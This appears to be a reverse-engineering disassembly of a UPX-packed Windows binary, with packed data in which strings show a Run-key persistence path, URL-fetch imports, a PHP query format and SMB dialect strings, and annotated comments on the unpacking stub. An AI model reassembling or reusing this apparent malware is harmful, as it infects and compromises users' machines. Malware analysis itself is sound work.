43010041h, 74707972h dd 74736544h, 48796F72h, 687361h, 79724301h, 65447470h dd 6F727473h, 79654B79h, 72430100h, 52747079h, 61656C65h dd 6F436573h, 7865746Eh, 43010074h, 74707972h, 75716341h dd 43657269h, 65746E6Fh, 417478h, 79724301h, 6D497470h dd 74726F70h, 79654Bh, 0DE00h, 0EC00h, 72730100h, 646E61h dd 6D656D01h, 797063h, 72747301h, 6E656Ch, 6D656D01h, 746573h dd 6E617201h, 5F010064h, 65637865h, 685F7470h, 6C646E61h dd 337265h, 72747301h, 727473h, 72747301h, 726863h, 0E900h dd 11000h, 69460100h, 6957646Eh, 776F646Eh, 47010041h dd 6F467465h, 72676572h, 646E756Fh, 646E6957h, 100776Fh dd 57746547h, 6F646E69h, 72685477h, 50646165h, 65636F72h dd 64497373h, 73770100h, 6E697270h, 416674h, 0F400h, 12400h dd 6E490100h, 6E726574h, 704F7465h, 72556E65h, 100416Ch dd 65746E49h, 74656E72h, 6E65704Fh, 49010041h, 7265746Eh dd 4374656Eh, 65736F6Ch, 646E6148h, 100656Ch, 
65746E49h dd 74656E72h, 43746547h, 656E6E6Fh, 64657463h, 74617453h dd 49010065h, 7265746Eh, 5274656Eh, 46646165h, 656C69h dd 10000h, 13C00h, 73FF00h, 0FF0002FFh, 1FF000Dh, 39FF00h dd 0FF006FFFh, 17FF0034h, 0CFF00h, 0FF0009FFh, 13FF0004h dd 10FF00h, 0FF0016FFh, 3, 50000000h, 4C000045h, 0C8000201h dd 40D859h, 0 dd 0E0000000h, 0B010F00h, 601h, 26h, 12h, 34000000h, 23h dd 10h, 40h, 314200h, 10h, 4000002h, 0 dd 4000000h, 2 dup(0) dd 60h, 4, 2000000h, 0 dd 1000h, 10h, 1000h, 10h, 10000000h, 2 dup(0) dd 34000000h, 8C00002Dh, 15h dup(0) dd 7C000010h, 1, 5 dup(0) dd 2E000000h, 74786574h, 56000000h, 24h, 10h, 26h, 4, 2 dup(0) dd 20000000h, 2EE00400h, 61746164h, 14000000h, 10h, 40h dd 10h, 2Ah, 2 dup(0) dd 40000000h, 0C00000h, 3C000050h, 0C300002Fh, 0A1000054h dd 89254BBEh, 0DB43AA85h, 0AEF070A0h, 92A2047Dh, 4EC00F3Ch dd 27BE81Ch, 8402F26Ah, 47FC7D1Bh, 0F0024A19h, 0A033E402h dd 2164868h, 0D2B735D7h, 0A73D7D03h, 769F6801h, 36E6CCE6h dd 3A4A2064h, 1B5AB7CCh, 0DC87B734h, 6A7684E0h, 96F42A70h dd 0E6C8E38Ch, 5EC86080h, 7A97640Ah, 273E1B25h, 0A2280084h dd 364B003Fh, 3CD9B96Bh, 98B9B26Ch, 0E477BDE2h, 0DC016754h dd 317E500Fh, 0C777C3E4h, 0AC683B0Dh, 0D328C00Dh, 0B138CEDCh dd 0E56F08C9h, 0DB0C7A04h, 0D2484522h, 0DD2DC5F8h, 0D61B212Fh dd 402EDB1Ch, 67012DEh, 4C9039ECh, 40BCF844h, 0C27190D6h dd 1BDE5044h, 593B1E10h, 94B7336Fh, 8121970Dh, 67E9ACF9h dd 0E87CFEEBh, 1624A580h, 68250600h, 259D1C52h, 1CF25B07h dd 96F41276h, 899DE9C3h, 940AEF65h, 7BC87C6Ah, 64B1E3C3h dd 0C9BE490Ch, 991DD97Bh, 90E154E4h, 8C9FE924h, 0DCCCC349h dd 0CF78242Eh, 2C8248EDh, 0F864052Ch, 66F4150Ch, 3319A002h dd 8707A23h, 8F895E74h, 0F4C6DD0Eh, 1C51CC5Fh, 80B3EF9Ch dd 7F24E4A1h, 5A435A8h, 0B5D0781Bh, 571282F8h, 5A745737h dd 0ACBF931h, 74F80E14h, 9A0684Bh, 0CA28B753h, 2D3D74CEh dd 67ED85C9h, 0A0412069h, 0FFC55FFh, 35BAB9E8h, 50E49ED7h dd 0E9628ACh, 5B3002F0h, 5547BF4Dh, 8C0009F8h, 681583E4h dd 0F475583Bh, 1887EE42h, 851321C5h, 0A90A508Bh, 0BFF77FB6h dd 3C418B2Fh, 68C10357h, 488B4D2Ch, 50788B34h, 0A0F44D89h dd 0EE062AB4h, 
1C68D84Bh, 5D97D81Bh, 0F0F559AAh, 868D201h dd 0C18DEC12h, 0ED74C3B1h, 1110D70Dh, 0F46F0E82h, 1409B26Ah dd 0F84DF123h, 91762C51h, 18185085h, 892A6897h, 6C54A0E9h dd 0CA405DB0h, 46C0ED03h, 0EB346B63h, 9AAB1930h, 596ED578h dd 37DF055h, 0AB6745E6h, 0F03EDD4Bh, 53503151h, 9E0AC1Eh dd 0F435C4F7h, 17FAD6BDh, 3FEA6D6Ah, 5577D0F1h, 74C73BECh dd 1BEB5805h, 5AE57E17h, 25348CBFh, 5FC0E59h, 36E7345Fh dd 740807EBh, 0E1FC58EFh, 5F521E86h, 602F5151h, 0B269310Fh dd 5C91A144h, 0BAB8250Dh, 0DD20DB42h, 0B213B1AFh, 1133AEECh dd 2D590FEBh, 0B66AF9C2h, 99EDC4B1h, 0C803CBCh, 1450A850h dd 7D2774D6h, 5DC02C50h, 4459FC19h, 437C20BAh, 247C8B57h dd 0A5C58314h, 7E11D25Ah, 641A8717h, 803FFFF5h, 148861C2h dd 0F73B461Eh, 2480E97Ch, 0C68C003Bh, 54D5D6DBh, 5F2E448Bh dd 5657AC5Ah, 30181DDBh, 2F216674h, 8896DC73h, 50F02EEDh dd 565019h, 3C3ACAAh, 9577E134h, 49F44DC4h, 8F6B6E8Ch dd 0F00CFA68h, 0C908C7FFh, 349B6996h, 2E2ACC34h, 99AD734Ch dd 0A0A75EDh, 1A20BC50h, 3E160118h, 7C654A1h, 13B7FB8h dd 0ADF1CE74h, 8B0C407Dh, 51080100h, 5F24448Dh, 9B613421h dd 0D31130C5h, 74245903h, 7F84EE8h, 7BBCC15h, 662FC820h dd 3333C7FBh, 0C1F8C8E4h, 0B8510E7h, 4679B0D4h, 8B0200B6h dd 33125Dh, 0F3702647h, 19DC201h, 53C4EAC9h, 0A311E3C6h dd 0F2B57B35h, 0C3255035h, 26B69D83h, 0ADE74880h, 40666CB5h dd 41F0179Eh, 0BB683595h, 98CEE331h, 0B76C683Dh, 474FF044h dd 19B1606Ch, 0A54D54FEh, 2CC5D314h, 7C54DADCh, 0FC0DFE00h dd 33A134BAh, 2B7900B9h, 72C13BC7h, 72C18B02h, 0E1EBB76Fh dd 0E8A1292Bh, 23C70318h, 0FE25A3ACh, 233DCC96h, 786A1172h dd 0DA3140F8h, 0C4EB3C28h, 7750E113h, 6CF64F26h, 941ED411h dd 0CD3C6815h, 0BEE4D62h, 97386803h, 9D663E3Ch, 54533AB5h dd 0D0835253h, 8C47E0B1h, 4C29824h, 136D8223h, 0E643098h dd 0E8D0B1F7h, 8C316D4h, 0BBEE4E29h, 89574377h, 80686806h dd 27841D89h, 5D4F7E18h, 14EC6DA2h, 0F2D4C0h, 0C1345391h dd 27B6B6Ch, 80EB3A01h, 9AD468E6h, 1A4DFD77h, 0B34A3678h dd 0DCCD2F74h, 677A5EA3h, 0A3650C75h, 53FCA4FEh, 1AD9D251h dd 3A865613h, 0DC3E68D8h, 2656D88Ch, 58195EF9h, 0F8DA6A12h dd 5E0510C2h, 0EF4B56C0h, 0C6697A4h, 
0EC5D89E8h, 0DFFF050Dh dd 25EDF760h, 3A041FFFh, 43FCA3C3h, 8A1FE774h, 5FC984CCh dd 74E849BDh, 0EA6B50DFh, 64405F42h, 0A51985BAh, 440C6465h dd 2BE9AFA3h, 14F85F7Bh, 9E481FD8h, 0FACEADECh, 15207E68h dd 0E2EB624Eh, 5CC1CF53h, 455FE142h, 0AC019043h, 70661D7Bh dd 0B0333CAEh, 0D30711D6h, 23EDB43h, 803AD6E6h, 9B0D0AF9h dd 0ABB068B4h, 74E063A3h, 822B01D8h, 0F4A37B7Ch, 8609D9FBh dd 0B73DE4CDh, 29E04552h, 0EECDF670h, 1904640Dh, 68631BE2h dd 0EC1323B2h, 5C344FB5h, 1386EB13h, 0B06099AEh, 3569FB1Ah dd 397044F8h, 90252C40h, 0D2908F93h, 70CDC864h, 90458C13h dd 9406EF5Ch, 72391C54h, 9C4C98E4h, 0A43CA044h, 47239134h dd 0AC2CA88Eh, 391CB024h, 0B4C8E472h, 0BC14B818h, 9F0CC010h dd 0C41C8E47h, 0CC04C808h, 0F8D04DFCh, 2391C8E4h, 0F0D8F4D4h dd 85AEECDCh, 0E8E07239h, 487E4E4h, 8B66BDh, 0A36CD337h dd 0B978DADEh, 2FCB06Dh, 7309838Ch, 0EC8C3412h, 415C0376h dd 4A8D9085h, 0EB0CFF59h, 4D8D1AE8h, 0B40DE438h, 0C9391A5Ch dd 870BF07Ch, 0D4683974h, 37A8AB4Dh, 0B6326277h, 0C4064DCCh dd 843E0D6Dh, 9ABC4984h, 4E570465h, 2ADB3B72h, 0A341521h dd 276E16A2h, 41173E3Ah, 5F9A2842h, 7D21E014h, 0F818B4E8h dd 0EB9C1388h, 0C28242E3h, 5A159993h, 1B6095AFh, 63554703h dd 0DE7FA480h, 0AD11F0AAh, 0B458A51h, 32FF6A9Eh, 80C1EDDBh dd 0CC3A52C3h, 0DC5D3831h, 0F108FE3Ah, 0B5D8825h, 0FFD07D2h dd 5A0C35B7h, 0F80CFF59h, 0F7990F93h, 8ED603FEh, 0FB80C3FEh dd 2ED572FFh, 5EBDC65Bh, 5F7662BAh, 9813B264h, 68336F04h dd 56DA0958h, 81084F38h, 0C70D040Ah, 9DB59B0h, 80758F0Bh dd 609B492Dh, 5FF90F75h, 1E892C25h, 3D9DADE4h, 3FF8432h dd 0FB8143D7h, 0B50DBE71h, 5F9F9623h, 6BA65D87h, 7B4F3B16h dd 6DA25A73h, 0E6573C19h, 9973002Fh, 0FDBE78B7h, 0F6FEFF04h dd 61887F3Ch, 33FC6C5Bh, 88BF50Fh, 0AADCF33Bh, 0D8B3B276h dd 57A0A33Eh, 9C572F9Eh, 2259ED9h, 1359F8D6h, 256E25C3h dd 0B3BBFF0Eh, 0C3F2EE75h, 68E1AC8Eh, 0D3A62710h, 969ED3BEh dd 84C1C180h, 50A92D70h, 1052AD62h, 8FC2454Eh, 0BA6032F5h dd 0F2AA5C6Ah, 0E0F9DCDFh, 0BFC3A4Ch, 6468B003h, 372DD4Eh dd 11103B06h, 0D742BA27h, 6CE012F7h, 0B80C609h, 0B02B39DFh dd 556F0BB0h, 84579356h, 80CC78D8h, 5113E6D8h, 
68661C4Dh dd 0FD1F0CA5h, 0D91462F4h, 538906EEh, 20BF661h, 838506Ah dd 0A05BFDAFh, 0D2052C5Dh, 18740096h, 73071109h, 1001478Dh dd 141905h, 9DD8513h, 1706D84Fh, 42BDAA0Eh, 74F081DBh dd 0C7D5530Dh, 0BE111051h, 392101E1h, 3A18244Ch, 7EED85EDh dd 0D876D811h, 264BA586h, 0EF144D2Ch, 6C192596h, 0EBA20577h dd 8B750DF2h, 65B8B076h, 68FADDEBh, 0C11B333Fh, 968160C8h dd 77D0150Ch, 6EA96236h, 90140810h, 2F874BA3h, 5618D951h dd 0D8D85CFCh, 0F61837B2h, 743D563Eh, 6311CE05h, 61412ADCh dd 0B74B2C9Ch, 102050D3h, 59030818h, 0AA0B62FCh, 8B550F5Eh dd 5ACEE1C6h, 2E33A257h, 56532C56h, 0C9901884h, 25270055h dd 5ACE5903h, 40C520Ah, 9262CF20h, 28AF5D0Ch, 89E2B701h dd 21DE53C3h, 948E694Eh dd 13F6F438h, 5C1E3C34h, 0F7794E36h, 43ADDE04h, 281D146Ch dd 687AA42Dh, 92C1EC35h, 0F4D85A2Dh, 22F40910h, 0CF203BD0h dd 0EEF8367Ah, 477D221Dh, 11E748Dh, 0F556FC7Bh, 4804C1FEh dd 0B5FF1C1Eh, 0B9B345E0h, 0FF452F20h, 8521F0Fh, 61C35760h dd 1C465033h, 3489BD76h, 0B733A074h, 57D6A93Ch, 0D91B1C8h dd 984FACB6h, 1C80D406h, 0D8E47239h, 0E06CDC74h, 9148E460h dd 0E88E4723h, 0F020EC3Ch, 1934D110h, 0B700F4CCh, 63BF0B84h dd 647CE261h, 8B7EF9BEh, 0A16451A2h, 0B4C43D18h, 0CBD83608h dd 0E177572h, 0A64D1D49h, 2A099E9Ah, 0BDA3833Eh, 8A460975h dd 7888E044h, 8C47F46Ah, 0B40974B0h, 6A885974h, 8BB38163h dd 84BCDE59h, 7A2F22A1h, 0E0833FC1h, 5C08303h, 86B9CD57h dd 0FD594A8Bh, 509D10CFh, 3D12186Eh, 1C3DD607h, 0E26EE66h dd 50E83F14h, 982CEF42h, 2040A261h, 4B7CCA41h, 0D7C63F68h dd 0CC59B306h, 1B41D986h, 0CFA125D3h, 0B801F454h, 9681E007h dd 9F8B0F40h, 3EC18817h, 481FC517h, 5FD14C7h, 25596D30h dd 0E0B3BA10h, 0BF501D6Ah, 86103DD8h, 51FC71F0h, 1537743Fh dd 31583A06h, 60A7BB0Ah, 0BEFD8A06h, 0F45352D1h, 7EE6BC3Dh dd 3D53D8B3h, 0FEBB138h, 0A0C1CE59h, 0B632BDB3h, 38DE1B68h dd 65E265B0h, 0C868C226h, 5B373B4Fh, 0BB46D1F6h, 971A0DB9h dd 41D60B35h, 4C125E12h, 7A4EC6F0h, 0C631EE4Ah, 0B6413BBBh dd 2CFD90CCh, 90B610B5h, 480718B7h, 6015EB0Ch, 2D1880E5h dd 0AF1909CDh, 5132BA1Eh, 44330C5Dh, 0EC5B3D50h, 6A7D6883h dd 0CC401113h, 0F42A66E7h, 2806FF00h, 
0A910F805h, 0F49199EFh dd 51001BF0h, 8DF7DF9Bh, 723B8D1Ah, 0BE98114h, 0AD85042Dh dd 1B1FDBEh, 2BEC7317h, 0CC48BC8h, 88BE18Bh, 0B5B236EAh dd 4353A302h, 45055C64h, 58363605h, 0A2000049h, 0F1022C02h dd 8F34BF14h, 52240206h, 80314153h, 0B77FFFFFh, 0F501018Fh dd 7911838Dh, 0E42AEC52h, 49E7F63Ah, 0BEE0EA9Bh, 7EDB21AFh dd 0FFFA9544h, 5E1AFFFFh, 85A03261h, 949F6A1Fh, 843994FFh dd 358F26A6h, 0A55C1DCEh, 7AB20BC9h, 0FF307265h, 371FFFFFh dd 697A6F4Dh, 2F616C6Ch, 20302E34h, 6D6F6328h, 69746170h dd 3B656C62h, 0FFFD4D20h, 4953FB5Bh, 15362045h, 6E695709h dd 73776F64h, 20544E20h, 29312E35h, 0D40BBB3Dh, 8EE434h dd 0C40104D4h, 0CF3DF7B4h, 90A00EF3h, 68047480h, 3CF3CF0Eh dd 480958DFh, 30D4743Ch, 64D937CFh, 10222045h, 0ED00304Ah dd 0F83E437Fh, 76631340h, 75722E76h, 0BDB6367Eh, 70077B5h dd 976C6465h, 0C1660F65h, 0FF7B7FF2h, 61657365h, 0E686372h dd 626F721Fh, 6863786Fh, 0DB676E61h, 0D2B9BB7Fh, 0C74651Fh dd 622E6472h, 61007A69h, 85D86328h, 6B68E46Dh, 740C6D61h dd 24782D06h, 0B9BB6DB3h, 6F6C0600h, 6B37620Eh, 0BEF6FD47h dd 276266Dh, 76742E7Ah, 6F74111Bh, 856E2E70h, 178C2D80h dd 27730F69h, 80FF0B33h, 0F788D6Dh, 6C756461h, 4B652D74h dd 7EDB7669h, 338072B3h, 73A66E6Fh, 622E744Eh, 0DF0AC07Dh dd 67694F67h, 77780032h, 5B7FB361h, 626A2CFBh, 9B00AD62h dd 6166617Ah, 0F84887A8h, 655D2EB6h, 61AF5C23h, 0F6EDF862h dd 656463FFh, 69686766h, 6D6C6B6Ah, 7271C56Eh, 777675F7h dd 0FFC67978h, 650E50DFh, 46454443h, 4A494847h, 4E4D4C4Bh dd 5451504Fh, 0FF68C3FFh, 57565554h, 1B5A5958h, 74746823h dd 2F2F3A70h, 3B9BF025h, 2F0B73B0h, 702E9765h, 7B3F7068h dd 0EB6FB7Eh, 73260F3Dh, 64066E63h, 666E6926h, 29073B76h dd 313D7DB7h, 74132639h, 58EBA01Bh, 60F6BBFBh, 3732313Dh dd 3A3101A8h, 2F303038h, 80FFDF65h, 0DFEC8Dh, 335DDFE8h dd 0EEB966C9h, 0FFDB6FFFh, 5758D01h, 68AFE8Bh, 4607993Ch dd 46302C06h, 7889934h, 0EBEDE247h, 0E8342FF7h, 7EDAE80Ah dd 2E6765DFh, 0C9999371h, 0DFFFEF01h, 0BDFD12FEh, 716FD91h dd 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 1A98A91Ch, 0F75BB1FFh dd 0F198F3C9h, 71028608h, 5F9010C0h, 599237CBh, 0F931C96h dd 
3A78B3FBh, 7157E414h, 713A0A7Dh, 0BEFB9D45h, 0F19DF3EDh dd 0F1098904h, 40119C04h, 0FD8EEDB3h, 0E3F36723h, 0DC1C10F0h dd 6059B20Bh, 3D8FC99Bh, 125EFF6h, 0A10414D9h, 9E71CA17h dd 61688D2Bh, 964617B3h, 0E21AAD91h, 28111D96h, 0ED6F6D9Fh dd 0C850B2h, 57DC1499h, 4E122555h, 0DFECC0A4h, 1291EDDEh dd 0F7ED9949h, 0C4140054h, 71CBCA3Ah, 87B31C3Bh, 24FFFDDDh dd 0CF1A21E4h, 668FCDCDh, 0FBB6812Ch, 1E3F6C9Fh, 83B8B0FBh dd 5D12CDC3h, 1DCBC9A8h, 6F9DB27Fh, 0B24AD25h, 96A6485Ah dd 0C9FECBC0h, 4C1B1464h, 0F3EBA729h, 0D9FFBA9Ch, 16E9B3F7h dd 7126F434h, 0F90EFCF5h, 29EF133Bh, 6FFF6B46h, 5F37F776h dd 0EC4766DEh, 116A0A8h, 0EDFFC5B7h, 0FDE9ECE9h, 0EF610FBBh dd 2CE1FCB7h, 0FCF5CA01h, 0FCF25AFCh, 0FDBFFFE5h, 0F5FCF7EBh dd 0C7D6ABAAh, 59AAF934h, 2A2A25B4h, 93ACC966h, 0BEB78190h dd 90FF67F0h, 0C983639Dh, 309271CDh, 513519BFh, 0A95D914h dd 0FFFF9172h, 712AEC20h, 0A5D2EBC8h, 0E180D512h, 6FAA529Ah dd 9A2A8D14h, 46FEDFC8h, 8B12B9FBh, 0C3474A9Ah, 0DB9BAB9Eh dd 0EC20A319h, 0FFDDA26Ch, 0BDFFFDBFh, 0DF9EED85h, 0EB81E8A2h dd 0C8125544h, 2E961FBDh, 0D812EB8Dh, 125A9A85h, 0FF9A099Dh dd 5ACD0B09h, 0D096F810h, 7F664922h, 8712FEFDh, 0BB6F6EDBh dd 95C25AA9h, 82128502h, 0CB5A9104h, 0F9B9CFF7h, 857F4067h dd 424D53FFh, 0C8531872h, 9CFF4BFh, 62FEFFh, 83435002h dd 4F575445h, 0E35BED52h, 50204BFFh, 52474F52h, 31204D41h dd 414C17CDh, 52024D4Eh, 0A6290EBh, 0B71566ABh, 0B75BB696h dd 0BB676B03h, 330E7075h, 0B61F611Ah, 4D27EB74h, 21583223h dd 2E323232h, 66D35831h, 2018D62Ah, 5A8B323Ch, 0A433C8C9h dd 0EC1B0773h, 0C2285DBh, 40023FFh, 20140A11h, 8DDADE05h dd 69A0D41Ah, 534B4C00h, 4915053h, 97B7887Fh, 4AE00882h dd 0EDF81773h, 6E240057h, 6F006400h, 3A730075h, 5EDEC874h dd 901306Ch, 3500398Ch, 0DCC06C23h, 72E1D96h, 32ABDA00h dd 889CF20h, 3B57DA20h, 9F4C9383h, 46F20003h, 0C1901E23h dd 40074706h, 0D1060006h, 1046E7FFh, 8A151F01h, 48E088h dd 8144004Fh, 0FE1BFFFDh, 0F27A6A19h, 281C49E4h, 742530AFh dd 0E1536710h, 137C853Ch, 3075DF5Ch, 0AEBD0400h, 75CB6B9h dd 5C085ABDh, 72363761h, 72E4DD7h, 2E380036h, 3B1B3077h dd 496D899Bh, 
0E843EC00h, 0F9633F00h, 640E7900h, 4DC08A2h dd 6DFF20F6h, 0FF1640h, 0E00DEDEh, 19F1600h, 9BF2602h dd 28401213h, 0C1110319h, 8B7DC346h, 0D374D96Ch, 0BBE42970h dd 9C2A9BACh, 0D81D256Bh, 109F6DB3h, 1B04480Eh, 5D6DCF54h dd 5A5413D7h, 22596326h, 83CBC75Ch, 45B9FF34h, 58765h dd 4810030Bh, 0C5FFFFB8h, 0EB810DEh, 286A050Bh, 0B10C3919h dd 0A89B11D0h, 7D4FC000h, 0D9EC7FE1h, 5D5FF52Eh, 1CEB8A88h dd 0E89F11C9h, 48102B3Ch, 0B22E7C60h, 0F40CD197h, 0CA060A3h dd 95E43C80h, 0CB10CA0h, 32393BFEh, 880CA000h, 90040h dd 847B03ECh, 7F927h, 4F401495h, 0BF40707Ch, 6C8A5ECh dd 13430700h, 88FFC279h, 138578h, 0E9A65BABh, 18F81013h dd 2FE409CFh, 230EFEFFh dd 0D45830C1h, 8408BE40h, 7DD3E488h, 10B943D2h, 0B801FFEEh dd 79366110h, 0AD200CF2h, 9F7F070Dh, 0FF215E5h, 700118D8h dd 0F900F84h, 0F842579h, 4D000F95h, 206FC9Eh, 6C0F847Fh dd 84AADE0Fh, 0A89A0087h, 93F436Fh, 1F13C88Ch, 50586E69h dd 0C0A6DB20h, 7250CAh, 39014446h, 3C844FC9h, 123C6B32h dd 7B027515h, 413C840Dh, 941C0053h, 1CAFFF01h, 0C606EB22h dd 73255C5Ch, 6370695Ch, 9BFFF975h, 0EC816624h, 0E4FF071Ch dd 44655300h, 67756265h, 0FA377669h, 67853518h, 6A6441A7h dd 6F546175h, 0EC99B6E4h, 176E656Bh, 126F4C73h, 0BF6D7075h dd 61569FDDh, 4165756Ch, 28704F17h, 7324636Fh, 8D48EA58h dd 76430034h, 65333F61h, 0E33152A3h, 0F86D4C79h, 0F5056D1Bh dd 545F1165h, 57796172h, 95D52DB5h, 31431735h, 52521A61h dd 682DBB9Dh, 6854056Fh, 7356140Ch, 0A35B6B75h, 284158DBh dd 0A578454Fh, 77336D67h, 47356E3Ah, 121EF3F5h, 48F46897h dd 7F505454h, 5732203Ch, 0FDEF52B5h, 0D4B4F20h, 9F4B010Ah dd 6ADF6644h, 4C2D02BBh, 3A2D6704h, 18752520h, 0CA587B5Ah dd 7954282Fh, 0A66D26B5h, 70A3DAB6h, 15836386h, 8EA9EE2Fh dd 2DC7025Ah, 42C97293h, 9F56B18Bh, 2B004757h, 0A35B47BAh dd 0E564F6F4h, 42CB73CBh, 6D8D57FBh, 0A9637673h, 0DA6977CBh dd 0F1538B77h, 175F3203h, 9A69E775h, 7B5E62Eh, 36373803h dd 0A6BB2774h, 331F3435h, 32033369h, 0D34B75F2h, 13393031h dd 0C8383F38h, 370D8320h, 20353607h, 34320C83h, 909A3233h dd 3031C83Ah, 0F93AF378h, 0CC95ACFFh, 4F53BBD9h, 41575446h dd 4D5C4552h, 62C1F869h, 
6F736F7Bh, 5CBF5CD7h, 72727543h dd 6B61BC22h, 73DC5615h, 75525C0Ah, 85B79F6Eh, 74231716h dd 6824D26Fh, 0FF532030h, 1B6850A3h, 673BE3F7h, 7264736Eh dd 1D93706Ah, 652B79B6h, 51530002h, 6612D86h, 6C0E5F06h dd 5736264Dh, 5F664B68h, 60C14923h, 34421C28h, 68FF5455h dd 130BC037h, 5E432053h, 0D5762067h, 0FB95B7B3h, 8058763Bh dd 0C823B532h, 7C65B05Eh, 0FC471A1Bh, 23596E66h, 79931217h dd 36346B73h, 4200707Eh, 61BF2063h, 0B7B5B623h, 6D1B1358h dd 0DD975220h, 0B4B63772h, 0E0440300h, 2F660E20h, 0EE7B25B0h dd 2AAC6D67h, 5B632463h, 22BFDAE4h, 20797469h, 1E6E614Dh dd 0AC31B81Ah, 74201501h, 2A2AAE89h, 0FD92BBC4h, 0EC01388Ch dd 65657246h, 0DBF0060Ch, 470DF923h, 6F4D7465h, 978A5F87h dd 6B4665E2h, 686D614Eh, 74736C01h, 0C01AEF7Bh, 0A956372h dd 79706F43h, 70A40A19h, 45A1816Fh, 4E326578h, 7C52FFF6h dd 6C6F6F54h, 32337067h, 70616E53h, 746F6873h, 4DADDD19h dd 32129C8Ah, 540F7372h, 14AD7305h, 182C358Fh, 80FB05B6h dd 78654E21h, 41616974h, 215FFD54h, 0F76451Eh, 7469616Bh dd 53726F46h, 0B6F6BA21h, 4F7B673Ch, 2C766A62h, 0D9B9E144h dd 8D225AC3h, 3A0B6972h, 0BFBDEC97h, 486573C8h, 0C646E61h dd 0C25E2447h, 8B6C3BDh, 5A61D26Eh, 0B5CDB3F0h, 0A3449711h dd 14796456h, 0B6DF75BBh, 2B61984Ch, 6F666E49h, 6509530Fh dd 37800670h, 9C496218h, 64656B26h, 64D98845h, 6EB328B3h dd 92E7FB36h, 12E0D0CDh, 6464410Bh, 0F7B30F72h, 4C0B111Dh dd 61726269h, 0E68AB567h, 4D2B60DAh, 36137C82h, 0D5CB080Bh dd 0C363CF8Eh, 547B42DAh, 75888169h, 4915DE65h, 0E94D8AD8h dd 1BDA3478h, 0DD29B36h, 0F239C45Dh, 4F116610h, 78455A62h dd 0B3612DB6h, 630ADF31h, 9B9E6D13h, 522DC6E0h, 87B591Bh dd 1766C0E0h, 38657A86h, 0A3604CA7h, 451585B5h, 0D160C3FCh dd 33759F9Dh, 0A1673A2Bh, 4579654Bh, 0CE40EC3Bh, 0FC18610h dd 5EC00A51h, 11F65AC2h, 5987309Eh, 21E7426Ch, 841CE010h dd 0C517B76h, 0BE6E6241h, 0E2B6853h, 310428A5h, 1AC13F86h dd 3677D985h, 62BB1089h, 440A7DB6h, 720E6112h, 0D61B6669h dd 0CA79B63Ah, 2B758F67h, 616F6C36h, 6FCE436Fh, 6F112C79h dd 67702350h, 0E8F5210h, 38F63F90h, 4114B4D0h, 69757163h dd 74AE7072h, 35494DD8h, 0C3363AA0h, 0DE1359A7h, 
0CA7273ECh
                dd 18B16D06h, 35B2D1CEh, 150F920Eh, 536B99DAh, 445F1D4Dh
                dd 740AC558h, 685F3FB8h, 3627F9F6h, 2CC46DBh, 4F727907h
                dd 880110E9h, 9160AD15h, 1CC2D22h, 271DCD34h, 61150E65h
                dd 14362CC2h, 0BBB4E70Ah, 4906EE15h, 70737766h, 4166B105h
                dd 9C62834Fh, 424F466h, 0DB616C5Ah, 9B558543h, 370E1141h
                dd 6705212Ch, 1B866B14h, 6E0306A6h, 74534349h, 8C950E81h
                dd 0D471A65h, 0A8EDB2CBh, 273FFA1h, 2C010D02h, 392CB2CBh
                dd 0C17346Fh, 0B2CB2CB2h, 10130409h, 4F45AA16h, 455036AAh
                dd 0E4FFB60Eh, 59C896B7h, 0E00040D8h, 0B010F00h, 260C0601h
                dd 68011CB2h, 2334DC12h, 0C6A32510h, 0B31420Eh, 0B7334A02h
                dd 0C079BA4h, 39341E60h, 10B0364Bh, 2D570607h, 6210805Dh
                dd 7C64098Ch, 0B0AE3145h, 6A2E1E01h, 0B60D8180h, 269024A6h
                dd 7C7B64C4h, 0E0049F90h, 0FBE1642Eh, 0D85BA114h, 272A0737h
                dd 48C016h, 81434BE0h, 54C32Fh, 2 dup(0)
                db 90h
                db 0FFh, 2 dup(0)
                align 10h

; ---------------------------------------------------------------------------
; Unpacking stub (still inside the UPX1 segment).
; NOTE(review): the segment names and the bit-stream LZ loop below look like
; the stock UPX (NRV2B-style) stub; this is judged from code shape only and
; should be confirmed against a reference stub.
;
;   Stage 1 (up to loc_31427C82): decompress from dword_31426000 to esi-5000h.
;   Stage 2 (loc_31427C82):       undo the call/jmp operand filter, 7Eh operands.
;   Stage 3 (loc_31427CBC):       load DLLs, resolve imports, fill thunk tables.
;   Stage 4 (loc_31427D07):       popa, then jmp loc_31422334 (unpacked code).
;
; Register roles in stage 1:
;   esi = read pointer into the packed stream   edi = write pointer (output)
;   ebx = bit buffer carrying a sentinel 1 bit  ebp = last match offset (negative)
;   eax = offset being decoded                  ecx = match length
;
; None of the copy loops compares esi or edi against a limit: the stub trusts
; the packed stream completely.
; ---------------------------------------------------------------------------
                pusha                           ; save all registers; restored at loc_31427D07
                mov     esi, offset dword_31426000 ; esi = start of packed data
                lea     edi, [esi-5000h]        ; edi = output base, 5000h below the packed data
                push    edi                     ; kept for stage 2 (popped into esi)
                or      ebp, 0FFFFFFFFh         ; initial "last offset" = -1
                jmp     short loc_31427BD2      ; start by loading the first 32 control bits
; ---------------------------------------------------------------------------
                align 8

loc_31427BC8:                                   ; CODE XREF: UPX1:loc_31427BD9j
                mov     al, [esi]               ; control bit 1: copy one literal byte
                inc     esi
                mov     [edi], al
                inc     edi

loc_31427BCE:                                   ; CODE XREF: UPX1:31427C66j
                                                ; UPX1:31427C7Dj
                add     ebx, ebx                ; CF = next control bit
                jnz     short loc_31427BD9      ; ebx == 0 means the sentinel was shifted out

loc_31427BD2:                                   ; CODE XREF: UPX1:31427BC0j
                mov     ebx, [esi]              ; refill: next 32 control bits
                sub     esi, 0FFFFFFFCh         ; esi += 4; the borrow leaves CF = 1
                adc     ebx, ebx                ; CF = top bit, sentinel 1 enters at bit 0

loc_31427BD9:                                   ; CODE XREF: UPX1:31427BD0j
                jb      short loc_31427BC8      ; bit 1 -> literal, bit 0 -> match
                mov     eax, 1                  ; offset accumulator starts at 1

loc_31427BE0:                                   ; CODE XREF: UPX1:31427BEFj
                                                ; UPX1:31427BFAj
                add     ebx, ebx                ; variable-length offset prefix: data bit ...
                jnz     short loc_31427BEB
                mov     ebx, [esi]
                sub     esi, 0FFFFFFFCh
                adc     ebx, ebx

loc_31427BEB:                                   ; CODE XREF: UPX1:31427BE2j
                adc     eax, eax                ; ... shifted into eax
                add     ebx, ebx                ; then a stop bit: 0 = continue, 1 = done
                jnb     short loc_31427BE0
                jnz     short loc_31427BFC
                mov     ebx, [esi]              ; bit buffer ran empty on the stop bit: refill
                sub     esi, 0FFFFFFFCh
                adc     ebx, ebx
                jnb     short loc_31427BE0

loc_31427BFC:                                   ; CODE XREF: UPX1:31427BF1j
